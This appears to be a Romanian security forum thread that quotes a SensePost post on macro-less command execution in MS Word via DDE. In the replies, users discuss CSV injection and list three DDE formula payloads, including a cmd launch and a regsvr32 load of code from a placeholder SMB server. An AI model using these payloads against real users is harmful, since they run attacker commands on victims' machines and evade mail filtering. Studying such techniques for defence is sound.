Macro-less Code Exec in MSWord

[WarLord]

What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?!

Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available.

In our context DDE works by executing an application, that will provide the data (data provider). In a previous post¹ We discussed using DDE in MSExcel to gain command execution, and have had great success in using this technique to bypass macro filtering mail gateways and corporate VBA policies. DDE isn’t only limited to Excel and Word has had DDE capabilities all this time. This has been mentioned by others² as a possible avenue, but to our knowledge, no-one has actually demonstrated this to work.

 

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

 

L-am incercat in Word 2010, si merge.

[SirGod]

Da, interesant, dar metodele de exploatare (clasic si cu DDE) sunt deja cunoscute de la exploarea CSV injection (https://www.contextis.com/blog/comma-separated-vulnerabilities). Bine de stiut ca functioneaza si in Word, pacat ca si in cazul asta apar doua alerte. 

[theeternalwanderer]

Inca un articol recent pe aceiasi tema - http://georgemauer.net/2017/10/07/csv-injection.html.

Exista cateva chestii dragute care se pot face cu DDE:

• =cmd|'/C calc'!A0 (exemplul clasic)
• =IExplore|WWW_OpenURL!www.mataigrasa.com
• =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0

De cele mai multe ori am intalnit chestia asta in aplicatii web care genereaza rapoarte in format CSV/XLS unde tu ai un oarecare control asupra datelor care intra in raport.